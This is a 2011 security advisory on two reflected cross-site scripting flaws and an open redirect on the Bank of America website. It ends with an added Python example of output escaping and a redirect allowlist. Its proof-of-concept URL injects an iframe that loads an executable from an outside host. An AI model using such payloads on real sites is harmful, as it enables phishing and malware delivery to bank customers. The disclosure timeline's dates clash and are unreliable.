Document Title:
===============
Bank of America Website - Multiple Web Vulnerabilities

Release Date:
=============
2011-07-15

Vulnerability Laboratory ID (VL-ID):
====================================
10

Product & Service Introduction:
===============================
Official Website of the Bank of America (USA)

Abstract Advisory Information:
==============================
An anonymous laboratory researcher discovered 3 input validation vulnerabilities (2x Cross-Site Scripting, 1x Redirection) on the BOA website (bankofamerica.com).

Vulnerability Disclosure Timeline:
==================================
2010-11-14: Verified by Vulnerability-Lab
2010-12-03: Secure Vendor Notification
2011-01-04: Fix/Patch Vulnerability
2011-07-14: Discovery by Vulnerability-Lab

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Low

Technical Details & Description:
================================
1.1 A remote attacker can craft a specially manipulated request that uses a non-persistent (reflected) cross-site scripting vector on the main website. Because the injected markup is reflected unescaped into the response, the attacker can load arbitrary HTML (for example an iframe pointing to an external host) in the context of bankofamerica.com and use it against customer/banking accounts.

1.2 A redirection vulnerability allows an attacker to cause a client-side request to load different external content/websites via a link that appears to originate from the bank.

Proof of Concept (PoC):
=======================
The input validation (IVE) vulnerabilities can be exploited by a remote attacker with medium user interaction: the victim must follow a crafted link. For demonstration or to reproduce ...

IVE Reference:
http://www.bankofamerica.com/smallbusiness/promos/jump/merchant_meetorbeat/?cm_sp=SB-Merchant-_-SB-MerchantAcquisitionSB-_-%3E%22%3Ciframe%20src=http://global-evolution.info/etc/bad-example.exe>
http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm?template=auto_loans&cm_mmc=>"
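The following is an added example, not part of the original advisory and not Bank of America's code. It takes the first PoC URL above, extracts the reflected `cm_sp` tracking parameter, shows how an unescaped reflection into an HTML attribute yields the injected iframe while output encoding neutralises it, and adds an allowlist check of the kind that closes the redirection issue (1.2). The attribute template, the `ALLOWED_HOSTS` list and the function names are assumptions for illustration; the advisory does not name the redirect parameter or the server-side code.

```python
import html
from urllib.parse import urlparse, parse_qs

# First PoC URL from the advisory (the cm_sp value carries the injected iframe).
POC_URL = ("http://www.bankofamerica.com/smallbusiness/promos/jump/merchant_meetorbeat/"
           "?cm_sp=SB-Merchant-_-SB-MerchantAcquisitionSB-_-%3E%22%3Ciframe%20src="
           "http://global-evolution.info/etc/bad-example.exe>")

# Assumed allowlist for the redirect check; not from the advisory.
ALLOWED_HOSTS = {"www.bankofamerica.com", "bankofamerica.com"}


def extract_param(url: str, name: str) -> str:
    """Return the URL-decoded value of one query parameter (first occurrence)."""
    values = parse_qs(urlparse(url).query, keep_blank_values=True).get(name, [])
    return values[0] if values else ""


def render_unescaped(cm_sp: str) -> str:
    """Vulnerable pattern (assumed): the tracking value is echoed raw into an attribute.
    A value starting with >" closes the attribute and the tag, so any markup that
    follows is parsed as HTML."""
    return '<input type="hidden" name="cm_sp" value="' + cm_sp + '">'


def render_escaped(cm_sp: str) -> str:
    """Hardened form: HTML-encode the reflected value, including quotes, so it can
    neither leave the attribute nor introduce new elements."""
    return '<input type="hidden" name="cm_sp" value="' + html.escape(cm_sp, quote=True) + '">'


def is_reflected(body: str, payload: str) -> bool:
    """Tester-side check: the raw, unencoded payload appearing in the response is the
    signal that the parameter is reflected without output encoding."""
    return payload in body


def safe_redirect_target(target: str, allowed_hosts=ALLOWED_HOSTS):
    """Return `target` if it is a same-site relative path or an http(s) URL whose host
    is on the allowlist; otherwise None. Rejects protocol-relative (//host) URLs,
    non-http schemes such as javascript:, and userinfo tricks (https://good@evil/)."""
    parts = urlparse(target)
    if not parts.scheme and not parts.netloc:
        # Relative path: must start with a single slash.
        if parts.path.startswith("/") and not parts.path.startswith("//"):
            return target
        return None
    if parts.scheme.lower() not in ("http", "https"):
        return None
    host = (parts.hostname or "").lower()  # .hostname drops userinfo and port
    if host not in allowed_hosts:
        return None
    return target


if __name__ == "__main__":
    payload = extract_param(POC_URL, "cm_sp")
    print("decoded cm_sp:", payload)
    print("vulnerable:", render_unescaped(payload))
    print("hardened:  ", render_escaped(payload))
    for t in ("/smallbusiness/", "http://global-evolution.info/etc/bad-example.exe",
              "//global-evolution.info/", "http://www.bankofamerica.com@global-evolution.info/"):
        print(t, "->", safe_redirect_target(t))
```

Running the block prints the decoded `cm_sp` value (`...-_->"<iframe src=http://global-evolution.info/etc/bad-example.exe>`), the vulnerable rendering containing a live `<iframe>` element, the hardened rendering with `&gt;&quot;&lt;iframe ...`, and `None` for every off-site or scheme-smuggling redirect target.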